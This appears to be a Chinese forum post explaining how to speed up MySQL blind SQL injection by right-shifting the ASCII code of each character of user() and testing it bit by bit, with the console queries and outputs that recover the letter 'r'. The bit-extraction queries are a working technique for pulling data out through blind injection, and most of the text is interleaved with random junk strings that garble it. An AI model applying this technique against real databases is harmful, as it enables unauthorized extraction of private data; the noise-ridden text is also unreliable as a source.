关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
7 Y( X7 Y1 D5 Y2 s6 P9 c4 T( g
# U0 V1 c6 q1 Y1 T& u2 J$ j0 {1 E

下面将以查询mysql数据库当中user()的第一位为例:

1 a3 }) s0 Z1 q3 p5 `8 }
9 @- R9 C* W  c) l# F+ Y1 R
ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)


0 r8 {! G) c  B$ u
首先执行如下sql语句:



' ~, E, x" c, gmysql> select (ascii((substr(user(),1,1))) >> 7)=0;
! w' c1 q5 M4 F
9 F# ^% s* I2 |
: M6 v: _' ~/ K1 k% U; n+ j
我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

4 r0 {0 h8 b' X* y" [! P- {

& B+ d* H# j. h9 n: b5 m* X& I! ]( p第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1



% Q) Q+ ~8 Z8 e* G2 ^3 T" a. F如果运算结果为1,说明第一位为0,不为1
; W8 Y$ E2 @0 Q# y# m: Q
' r4 t1 ?4 R8 [3 H2 A; j  P

( S' p$ D+ W( N& I+————————————–+

| (ascii((substr(user(),1,1))) >> 7)=0 |

+————————————–+

& j) \# t( F7 n5 Q| 1 |

+————————————–+
& Z' o& A, K2 H3 h0 V% V( @/ X
$ V7 c: G3 p& B9 N( V$ X1 row in set (0.00 sec)
: l$ H$ h1 L/ p: m  j" F
这样我们就确定这个8bit的ascii的第一位为0
/ p. W8 W" {, `/ h* y# y
% a7 l! c) ^0 J% ^: {1 ^
6 t3 T( U3 L6 W3 G- l7 p9 i& _
第二次我们来做6次右偏移来确定前两位
# D) i- K5 Y( Q1 ^; g
# h) a) w0 S, y, l) O; H
2 A2 r  R  K: [& e/ f) J
1 \  S3 X2 R6 B! C8 [  F前两位可能是01或00,即依然可以与0做比较,

$ I  r  I3 X3 J4 j/ Q+ Z" Z# Wmysql> select (ascii((substr(user(),1,1))) >> 6)=0;
) ~% p2 Q: B$ N
+————————————–+
! z" Z: H2 G4 A
# \5 @# O9 }+ G1 N| (ascii((substr(user(),1,1))) >> 6)=0 |
$ [4 Q5 t) C$ Q: s" Y+ z1 {
+————————————–+
8 m2 C/ U! K, d8 B; F+ O
2 ]6 V* d# U9 N| 0 |
" p" E; r+ Q; v& w! g/ g; G
& ]6 |. N" _! F9 G+————————————–+

1 row in set (0.00 sec)
/ _4 A% a: t( K/ q

7 Q. z) b: H4 j8 L/ X; p& I0 ?
6 W/ i* S. [1 F+ u) W2 |5 Q结果为0,即第二位为1
' A4 Z7 U1 {) T" X( R1 Q

* N2 E4 {$ g$ K$ y/ h5 {
开始猜测前三位为010或011
+ L" |4 X4 K6 Y  [9 F2 I
. t% H, g2 `' B: q' X& ~& k! Z7 d
- N+ ?. W% u0 [) l6 h9 Q
让我们看看010和011的ascii码是多少
! p5 d6 L( N% v& U
$ A- e6 x. `& c4 B% }  C

分别查询select b’011′ select b’010′



: |  z  `' N3 ~" U4 \2 ~获得结果 010 = 2 011 = 3



执行如下sql:
4 G6 l" H8 A! ?$ V3 t4 q5 ~5 a

* o" t. }! a$ C2 \, \
, Z! l- \7 D1 g( z0 ?/ Tmysql> select (ascii((substr(user(),1,1))) >> 5)=2;

% L1 m# o! n* ]+ B, E+————————————–+

1 a8 [7 D7 E$ l/ Q% p0 `| (ascii((substr(user(),1,1))) >> 5)=2 |

: @! y6 Y2 z( t. Z. L# t$ B' Q+————————————–+

  Q6 h& K6 b$ t, J( V| 0 |
- ^! o$ E& s; O" k/ o& Z% Q& W. @
+————————————–+
4 N+ D5 r4 H4 c" O1 O' }
即前三位不为010,而是011
- E# P$ J, @9 T* R4 [8 n
% |' L+ m4 t4 u  n
) P$ z+ _5 g$ q  s1 i
4 m! g2 o: t: [) e' ]& v; G7 s直到获得最后一位


% L( x3 D# Q6 b. ~
6 d2 u# n0 u) A$ R3 D0 U5 Z% E最终结果为:01110010
# N+ h/ J2 v4 g" j
8 F6 K1 n4 g* [
* [% N. n7 e2 l0 b
转换一下:



; O/ v) n  M  L" [9 {select b’01110010′



查询结果


$ n% g5 h7 r. L! r, R
; v' R1 D7 }" j+————-+
; K- z& c2 N4 }$ T: m
| b’01110010′ |

4 P2 |, y- m9 m3 P1 ]! p) j" F+————-+

' _* N" G/ j, K- {; r| r |

+————-+

! @3 j$ T$ J% N6 w1 row in set (0.00 sec)
0 G( G. U6 U/ y1 ?
3 t; G+ D3 F) m1 I" T9 L
1 u4 }  |) V; I/ Y, U
# {1 Q5 f: ]5 r5 s8 P8 S$ u这样我们就获得了user()的第一位.其它位依此类推
8 f* [+ u/ N) T" f
7 u& O& O" y0 n4 R4 m1 B1 q